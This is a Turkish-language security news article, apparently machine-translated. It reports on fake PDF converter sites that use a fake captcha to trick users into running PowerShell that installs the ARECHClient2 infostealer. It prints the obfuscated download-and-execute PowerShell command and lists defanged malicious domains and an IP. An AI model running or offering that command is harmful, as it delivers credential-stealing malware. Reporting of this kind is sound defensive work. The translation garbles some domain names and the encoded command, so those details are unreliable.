Siber suçlular, popüler meşru hizmet pdfcandy’yi taklit eden sahte PDF-Docx dönüştürücü web sitelerini kullanan sofistike bir kötü amaçlı yazılım kampanyası başlattı.
Candyxpdf gibi alanlar dahil kötü amaçlı web siteleri[.]com ve candyconverterpdf[.]com, belge formatlarını dönüştürmek isteyen şüpheli olmayan kullanıcılardan hassas bilgileri toplamak için tasarlanmış ayrıntılı bir sosyal mühendislik taktiği dağıtın.
Kullanıcılar bu hileli platformlardaki belgeleri dönüştürmeye çalıştıklarında, bunlara animasyonlu yükleme dizileri ve tanıdık dönüşüm seçenekleri ile tamamlanmış meşru bir arayüz sunulur.
.png
)
Bir dosya yükledikten sonra, kurbanlar Windows+R’ye basmalarını ve gizlenmiş bir PowerShell komutunu yapıştırmalarını söyleyen sahte bir captcha doğrulamasıyla karşılaşır. Bu komut, yürütüldüğünde, nihayetinde ARECHClient2 bilgi çalkayıcıyı dağıtan sofistike bir enfeksiyon zinciri başlatır.
CloudSek araştırmacıları, bu kötü amaçlı yazılımın 2019’dan beri aktif olan tehlikeli Sectoprat ailesinin bir çeşidi olduğunu belirledi.
Analizleri, saldırının, “Bind-New-Connect gibi alanlara bağlanan çok aşamalı bir yönlendirme süreci kullandığını ortaya koydu.[.]IP Adresi 172’de barındırılan kötü amaçlı bir “Adobe.zip” yükü indirmeden önce “tıklayın”[.]86[.]115[.]43.
Kötü amaçlı yazılım, tarayıcı kimlik bilgilerini, kripto para birimi cüzdanı bilgilerini ve tehlikeye atılan sistemlerden gelen diğer hassas verileri toplamak için özel olarak tasarlandığından bu saldırının etkisi şiddetlidir.
Enfeksiyon, güvenlik kontrollerini atlamak için meşru pencerelerin kötüye kullanılması da dahil olmak üzere gelişmiş kaçınma tekniklerini göstermektedir.
.webp)
Enfeksiyon mekanizması analizi
Bu saldırının çekirdeği, kullanıcıların farkında olmadan yürüttüğü gizlenmiş bir PowerShell komutuna dayanır:-
powershell -win 1 -ep bypass -noni -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgB1AHQALgBXAGUAYgBDAG8AYQBKAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ΘΑΥQANACKAIAB8ACAASQBFAHgA.webp)
Bu kodlanmış komut, kötü amaçlı “Audiobit de dahil olmak üzere birden fazla dosya içeren“ Adobe.zip ”arşivini indirmek için bir web isteği başlatır.[.]exe ”yürütülebilir.
Yürütüldüğünde, bu dosya ARECHClient2 kötü amaçlı yazılımını, arazi olarak bilinen bir teknik aracılığıyla yüklemek için meşru bir Windows yardımcı programı olan msBuild.exe başlatır.
Kötü amaçlı yazılım, kayıt defteri sorguları, sistem bilgi keşfi ve kimlik bilgisi avı gibi birçok şüpheli eylem gerçekleştirir.
Kötü amaçlı yazılım, depolanan şifreler ve kripto para birimi cüzdanı kimlik bilgileri de dahil olmak üzere hassas verileri toplamaya devam etmeden önce makine kılavuzuna, bilgisayar adına ve desteklenen dilleri kontrol eder.
Kullanıcıların, arayüzün ne kadar meşru göründüğüne bakılmaksızın, yalnızca resmi kaynaklardan güvenilir dosya dönüştürme araçlarını kullanmaları ve komut satırı yürütme isteyen herhangi bir web sitesi hakkında uyanık kalmaları tavsiye edilir.
Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy